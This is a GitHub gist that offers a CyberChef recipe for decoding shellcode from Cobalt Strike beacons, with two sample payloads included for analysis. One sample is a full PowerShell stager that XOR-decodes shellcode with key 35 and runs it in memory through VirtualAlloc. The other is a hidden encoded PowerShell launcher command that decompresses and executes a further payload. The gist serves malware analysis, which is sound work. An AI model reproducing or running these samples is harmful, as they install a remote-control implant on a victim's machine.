Created
April 30, 2020 14:11
-
-
Save 0xtornado/69d12572520122cb9bddc2d6793d97ab to your computer and use it in GitHub Desktop.
CyberChef recipe to extract and decode Shellcode from a Cobalt Strike beacon
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [{"op":"Conditional Jump","args":["bxor",false,"Decode_Shellcode",10]},{"op":"Label","args":["Decode_beacon"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Decode text","args":["UTF-16LE (1200)"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Gunzip","args":[]},{"op":"Label","args":["Decode_Shellcode"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"Conditional Jump","args":["",false,"",10]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"XOR","args":[{"option":"Decimal","string":"35"},"Standard",false]}] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Set-StrictMode -Version 2 | |
| $DoIt = @' | |
| function func_get_proc_address { | |
| Param ($var_module, $var_procedure) | |
| $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') | |
| $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string')) | |
| return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure)) | |
| } | |
| function func_get_delegate_type { | |
| Param ( | |
| [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters, | |
| [Parameter(Position = 1)] [Type] $var_return_type = [Void] | |
| ) | |
| $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) | |
| $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed') | |
| $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed') | |
| return $var_type_builder.CreateType() | |
| } | |
| [Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSByckt2hyMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMTRR1EkhGVWROcXZvdnJCG1loTUAUcU1OUWJ3SlFNYFQjvLTHW2pHWSH8aiBzI6YUm3dAYLUNnsdxRUJhSsiV7rV2fxUkSKHG4Qfm2my6I3ZQRlEOYkRGTVcZA25MWUpPT0IMFg0TAwt0Sk1HTFRQA213AxUNEhgDdGx0FRcYA3dRSkdGTVcMFA0TGANRVRkSEg0TCgNPSkhGA2RGQEhMLikjPpmncpaTwXXfZ/P4PxXiSMhg8Vu3fsdoQZEAmRULgWILIWjS5Je9oY2tRF/3CVK0iG/EGiE4pskDsNBcFnti+smmfGmSz6DP3ghXDgq2EIFw/45tPo/3s3t7ZgfV5tF7mOcRbALoMqRsxsGv7ecHfLNbv55Ts7Gz43mpw7AKhte18aEwaelJ8rBaPiMAN3J6DIOl2R0y5Uh9KrEGhX3rA5JCkpTg3eA74fjMd0WEFN2xfp5z0dP39jOMCyZraMTiAHCpV0HNzmVjKRoj8ipg20F/fitioP9EvUs8+CNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcU0JQV0ZBSk0OUFZASFAOTUxUDUFKWSMxF3Vb') | |
| for ($x = 0; $x -lt $var_code.Count; $x++) { | |
| $var_code[$x] = $var_code[$x] -bxor 35 | |
| } | |
| $var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))) | |
| $var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40) | |
| [System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length) | |
| $var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void]))) | |
| $var_runme.Invoke([IntPtr]::Zero) | |
| '@ | |
| If ([IntPtr]::size -eq 8) { | |
| start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job | |
| } | |
| else { | |
| IEX $DoIt | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwA3ADMAUABhAE8AQgBQACsASABQADQASwBmAGMAaQBNADcAUwBsAFEARQBuAEoAcAA2AEUAMQBtAHkAbQAvAE0AQwA0AFQARwBKAEsASABsAEcARQBiAEkATQBqAEUAUgBGAGsAaQB5AHcAVgB6ADcAdgA3ADgAcgBHADMAUAAwAG0AcgB4AHYAWgArADQAeQB3ADAAUwBXAGQAbABlADcAegB6ADYANwBLADQAZQBxAGcAcQBPAEUAVAAxAFMAZgB1AHgAUQBWAEgAcQBtAFEAUABnAC8AUQBaAFMANQAzADMAdQBDADIAUQByAGYAbwBrADUASAB6AHcAbwBBAG8AdgBhADAAWABzAHcAVgBWAHMANwBYAGcAWgBJAFoAZABWADEAQQBwADAAWgArADUAcwB5AEUAVwBlAEkAWABNADgAdwBpAEwAMgBZAHEANwBJAGEATgA1AGwASAB4AG8AUQBlAHEARwBnAGwAcABuAFoANwBtAHoAWgBDAHMATQBKAFAAYgBvAEwATQBEAEsAagArAGgAcwBSAGQAVQB6AGQAeQBWAGMAWgBFADYAcQA2ADMAVwBEAHIANwBBAGYAVABEADkAKwByAEkAZABDADAARQBDAGwAMwA4AFUAMgBWAFYAVQBwADYAVwByAE8AZgBDAHAATgBDADMAMQBEAFQAOAA5AFUAMABNAEwAZABmAEUAbQBKAFEAbgArAGkAOAAxAG0AeAB6AGYAZwBjAHMANABOAFkAWABNAGYAawBHAFEASwBxAEIAcQA0ACsANgAzAEcAQwBkAFEAUgBGAFoAOAAxADgAWgBSAHAALwAvAEcARgBZAGsAOABMAEYAdABOAGoAYwBoAEoAaABKADAAMwBCAGkAcQBlAGkAcQA2AEQASgBtAFcATwBpADcAcABTADgAYwB4AFcAdABxAEcAbgAyAGYAQwBDADYANQBwADQAcABQAGYAbABDACsATABEADQAawAzAGcAOABTADUALwB1AHAANwA0AFoAMQBpAEcAeQB4AHgAaABEAEgAMgAwAEYAcQBxADYAbQBPAGEAYwBCAHkAQwBOAGgAVQBVAHcAeQBOAFAASgByAG8AKwB5AGIAVABLAGYAcAAwADkATwBZACsARABKAFMALwBvAGsAVQA3AFUARgBUAHcAdABVAE4ARgA1AEIATQBxAGkAeAAwAGMAdQBJAHoAZQBVAHcALwBVAEQAQQBuAHAAQwB4AGEARwBCAFUANABJAHEAawBJAFIAbwBNAHcAWAAwAEkAdgA0AEMAegBYAFAAZwA1AEMAeABQAE4AaQBkAC8ASwByAGQAcQBUAG0AZwAyAHcAegBjAFgAMQBVAHkAVAA1AFYAQQBhAHEAaQBFAGwAVAA5AHcANABsAGYAZwA2AEMAZQA4AFMAYwAxAEIATwBEADkANQBmADAASQB1AEMALwA1ACsASQBwAGkAVgArADUANQA3AGgAYQBvAHUAWgBYAFMAQgBGAFoAMABwAHcAUABlAEUAcQA3AG0AegBzADAAbQB5AHAAQgBDAFAATwBlAFQAUwBUAC8AUgB1AFUAUwBtAFAAKwB1AEEARQBWAGwAegBFAE8AcAAwAGoARQBWAEoAcgArAGwAZAArADAAbQBzAHoAVABaAGwALwAwADkAQgBGAHAAbgBYAFEAUwBkAE8AVAArAG4ARwBMAEoAbwAvAGMAZAA2AGUANQBNAHkAdAAzAFkASQAvAGUAbgA4ADEARABuADcAbABVADYAUABPADMAcQA2AEYAQgBQAFQAKwBnAGoAVABqAEEASwA1ADkAawBoAEQAZABmAHkAeABuADEARwBFADMAdwBLAEcAWgBpAEEALwBEAFQATgBBADQASAAxAEcAMABjADAARABFADAAbwBKAE8AZgAxAFoAbwByAFgAeAAxADEAYQA2AGwAegBWAFEASgA1AGwAKwBBAFYAVQBNAEwANgAwAFoAawAwAGgANgBaAGgAQgAzADIANgBBAHYAegBTAGIANgBEAHAAdQBRAGQAbABSAGoAUABwAFEAMgBuAEYAMgBlADMANgBXADMATwA1AHoAcgBDAFUAZQBUAFEATQBvAGMANQBKAEgAagBrAFUATQArAHIAbQBVAFQAVwBRAC8AdQBHAG8ARwBpAHEAZQBMAEkAMgAvADMATwAyAEgAVABQAGsARQBTADUAVwBaAG0AMQBxAHYAUQBIAHEANAB1AHMANABEAHEASgBpAFEAUQBIAFkAQgBoAHAARwB6AHAAcwBUAEgAVABLAE8AUwBSAHgAMwBmAHAAYgBYAFkAOABSAGUAWgBDADgAYQByAG0ATgBRAHgAWQAxAEIAeQBZAEMAbQBDAG4ATQBDAE8AeABzAEoAUgBtAGoAUABDAHoAZgArAGQASAAxAGIAUgBvAGMAcABlAHIAUgBsAGQAZwBYAFQAUwBoAFYAbwBNAEwANgBEAG4ASABDAG8AcQBvAFIAdABlAFUATgBmADQASAAyADUAbgBkAFoASQBXAGgAYwBZAHEAQQArAG4ARQBhAFMAQwBBAHcANwBqAEsAbwAwAGQAZgBLAE8AaAByAFIAdgA0AG4ANAB2ADAAegA5ADMANQBzAE0AVAArADQAVwBSAGYAMABrAEUAZwB6AEsAYwBSAEoATABWAGEANgBYAEIASgBKAG8AbwBmAEwANwBSAEgATABCAEQAbQBoAEEATABXAFcANABLAHMAYQBsAHYAVAA2AHkAawBuAGEAbQBHAG0AVQBiADgASwBOAEgAZgBlAFgAbgA2ADkARgB1AHgAbQAxAE8AcAB0AE8AYwB3AFMALwBDAEgANwBsAFQAYQB2AFoANgAzAFgAdgAxADcAWAA3AEgAbQBtAEcAZAA4AE4ATwBxAGUAdgBaAG4AMgA4AGEAVgArAEUAMgB0AE0ATgBSAHIAVgBSAHUAbABVAEIAdQB2ADIAawAzAFAAVAB1ADYANAAxADgAdQB3AHQAWABWAGgAYgB1ADIAbwB3AEgAcwB5AFEAKwBiAGoAbQB6AFkAVQBhAFAAYQB1AGQAegB3ADEAdgBYAEMAcgB4AHoAcwBwAFAAcQBmADUAOQB1AEwAKwBkAGgAdQBmAFoAaQAzAFcAMQBlAGQAUgA5AG4AUwA4AGgAMAA3AHEAcgBVADIAOQBRAHEASAA5AFgAcwA3AHEAdgBNAHUANgBOADEAYwByADQAUABhADEAcgAyAGkAegBlADQAMQBIAGYAZgBJAHQAcQB4AHUASwBGADcAcwA0AHYAOAA4AHYAbQB1AEcAZwArADYAWABrAGwAegAyAEkAUQBhAG4AcwBpAGYAZAArAHEAQgByAGwAOQBTAEgANQAzAEsAagBYAFIANQArADMAYwBkAGMATAB1ADEANAA4AEYAcwB6AFgATQBmAGsAUgBTADUAZgBZAHIASgAwADQAcgB0AFIATgB3AGEANQBsAHgAZgBtAE8ATABXAGQAYwAvAGwAMQA5AEgANwBvAGsAVQBwAHcAeAB3AGQAYgB0ADIAdQBYAFcANwAxADYAYQBVAGUAMwA3AHYANQB5AEgAUQA3AEcAbwA0AGUAWABwAGUATwBBAC8ATABWAG8AOABiAHUASABZAEMAUABiAGkAeQBzAG4ANQBPAE0AdABpAFcARAAvAHcAbgBIAGMAbgBRAHUAQgBSAGUAUAA0AFMAMwBtAEkAdQBiAHMAbAArADIAUQAvADcAagBmAGcANwB0AE0AegB3AEkAZQBVAE4AKwAyAGIARABzAFEAVgAxAE8ASwBlADIAUABnAEUATQBDAGUAZABmAHQAeAA3AGoAbwBkAE8AWQB0AE4AdABSAHMAdABMADcANABNAEgALwBwAGUAYwBkADAAOABYADYAMAA2AEgAVgBEAFkAZwBmAC8AMABjADEAVwBLAEoAcgB4AGgANQBjAFMAcAAzAFQANAB2AHgAbQBGAFQAVQByAGwAUABiAEQAMwB0AGsAcwBDAGYAbABUAHUAVgA5AFkAMQB3AFoATwBXAHoAUQA5AGkANQBxADQAOAAvAE0AZgBYAHIAbwBiAEIAKwBhAEQAOAAyAHgAdgBXACsATwAzAFUAZAA1AHEAMQBuAGwAYwBRAEYAegBZAHEAZAA3ADcAKwA4AEkALwBoAGUAWQBRAGsAZgBlAEEARgB1AEEAaQBIAHIALwAzAFQAdABMADkAKwAvAGoAeQBlAFIAOABOADgAMwBtADcAZgBHADcATQBOACsAQgB0AGYASgB2AG0AbwBQAEoAUwBZAFIAUABtAFAAZgBXAEUATwB0AGoASQBaADgAeABBADAAYgBDAEkATQByAGEAUwBJAHUATAAxAG0ARwBjAEQATABtAHYATgBVAHoAegA5AFIAZgBRAEMAeABVAEIAWgBmAEEANgBnAFAAZABEAFYAbgB4AFYAeABqAGoAUgBBAC8AQwBOAFMAUQBUAGoATwBCADIAUwBVADIAZwB5AEQANwBBAHMAWAA3ADYANgBzAHQAQgBSAEUASwBaAGUARwB0AE0AOAA5AEwAeABrAFMAQgB3AGkAegBHAFoAbABKAHYAagB4ADQAMQBjAEkATAAzADgAQwBZAG8AOABHAEMALwBXAGMAUgA2AFYAZAB1AFYAUQBxADYAZgA5AFgASgBTAHYAMwA2ADcARABVACsAVABvADIAagArAGIAeQBlAGsAaQBlAGUASABKADYARQAwAHQAdQBzAGcANwBvAGkAegBCAFkAMABYADgAeABBAFQAOQBjACsAdgArAGgAMQBlAEEAbABjAC8AWQBJAFgAZQBMAFEANgAzAGgAWgBPAGUATgBUAEwAbQBkADcANgBHAFIAZgArAG4AdAA0AFIAZABJAE4AdQBrAG0ANABKAHgAVQBXAHEAcgBEAGsAYwAzAGgAeQBKAGoAMwBVAFAATQBjAFcAcwBwAHQAagBkAEkANwBSAGQAMQBTAEEAOABLAHEAeQBmAEEAbgB2AFQAcgBFAEkAZABVAE4ARgA2AFQAUAA2AEcAOQBwAGkAUAAxAFgAOABoAHUANABwAG8AZgBBAE0ASwBuAFQANQBIAEYAaABLAFkAUwA1AHEAMAA0AGsAUgBMAFEAeAA3AC8AdwBYAEsAVABPAHAAdQBsAHcAcwBBAEEAQQA9AD0AIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA= |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment